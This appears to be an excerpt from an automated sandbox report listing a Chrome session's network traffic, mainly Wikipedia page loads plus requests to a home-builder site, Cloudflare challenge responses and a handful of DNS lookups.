Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1wwpp HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/project-logos/enwiki.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/favicon/wikipedia.ico HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientPreferences%2Cjs%7Cskins.vector.icons.js%7Cwikibase.client.vector-2022&skin=vector-2022&version=1jnq1 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1ezz7 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /wiki/Special:CentralAutoLogin/start?type=script HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1td88 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/project-logos/enwiki.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /static/favicon/wikipedia.ico HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script HTTP/1.1Host: login.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1ezz7 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1td88 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script HTTP/1.1Host: login.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/rest_v1/page/summary/Server_software HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brCookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /api/rest_v1/page/summary/Server_(computing) HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brCookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /api/rest_v1/page/summary/Server_(computing) HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /api/rest_v1/page/summary/Server_software HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brCookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98e
Source: global traffic	HTTP traffic detected: GET /api/rest_v1/page/summary/Server_(computing) HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brCookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98eIf-None-Match: W/"1265270284/351974c0-d21d-11ef-aaaa-90ccd02a326e"
Source: global traffic	HTTP traffic detected: GET /api/rest_v1/page/summary/Server_(computing) HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=e9901e6789977a5ed98eIf-None-Match: W/"1265270284/351974c0-d21d-11ef-aaaa-90ccd02a326e"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: fortishomebuilders.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: 757b3e01c=3e01cf63d8d2
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: fortishomebuilders.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://fortishomebuilders.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: 757b3e01c=3e01cf63d8d2

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: dtrnconsulta.com
Source: global traffic	DNS traffic detected: DNS query: fortishomebuilders.com
Source: global traffic	DNS traffic detected: DNS query: metin2odisey.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: href.li
Source: global traffic	DNS traffic detected: DNS query: en.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: meta.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: login.wikimedia.org

Source: unknown

HTTP traffic detected: POST /report/v4?s=Eea3yg8G1o3p%2FBHr78EasUsEuAT0m2SIm%2Fs7gUsZsvxj6hPNk3Auf6CJdrqnJaeMF5vOY8JlddFg4rmIVg%2F8hq%2Bl%2FBxuy4C8%2BZJDKM%2BCrTBn2cfCKeh6IlUxMVXRtcK9rWdz HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 426Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 21:07:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originx-content-options: nosniffx-frame-options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 21:07:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originx-content-options: nosniffx-frame-options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 21:07:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originx-content-options: nosniffx-frame-options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 21:07:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originx-content-options: nosniffx-frame-options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 21:07:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originx-content-options: nosniffx-frame-options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 16 Jan 2025 21:07:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e bf 0a c2 30 10 c6 77 c1 77 38 1f 20 44 a1 63 c8 22 0a 0e ba f8 04 a9 77 36 81 34 57 ae 71 c8 db 9b 6a 0b e2 ec e8 74 dc f7 e7 c7 67 7c ee a3 5d af 8c 27 87 d6 e4 90 23 d9 66 db c0 85 33 1c f9 91 d0 e8 b7 68 f4 2b 52 a3 2d 63 99 ee 8d 52 26 b1 c6 ef be 1b 55 31 7a b6 27 76 0d cd 1f 0f 94 84 c6 5c 3e 7d bd 10 f5 b2 66 a3 14 38 18 1c 62 48 1d 64 06 0c a3 6b 23 c1 f9 7a 3a 80 4b 08 7b 2f dc 13 dc 25 50 c2 58 80 44 58 6a a3 23 50 ea 8f f8 35 e2 09 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90ww8 Dc"w64Wqjtg\|]'#f3h+R-cR&U1z'v\>}f8bHdk#z:K{/%PXDXj#P5(0

Source: chromecache_102.2.dr	String found in binary or memory: http://fortishomebuilders.com/
Source: chromecache_112.2.dr	String found in binary or memory: http://www.mslicensing.fr/theorie/core-cal-vs-enteeprise-cal
Source: chromecache_112.2.dr	String found in binary or memory: http://www.msterminalservices.org/articles/Changes-Windows-Server-2008-Terminal-Server-Licensing-Par
Source: chromecache_112.2.dr	String found in binary or memory: http://www.networkworld.com/community/node/61283
Source: chromecache_112.2.dr	String found in binary or memory: https://archive.today/20120906095448/http://www.msterminalservices.org/articles/Changes-Windows-Serv
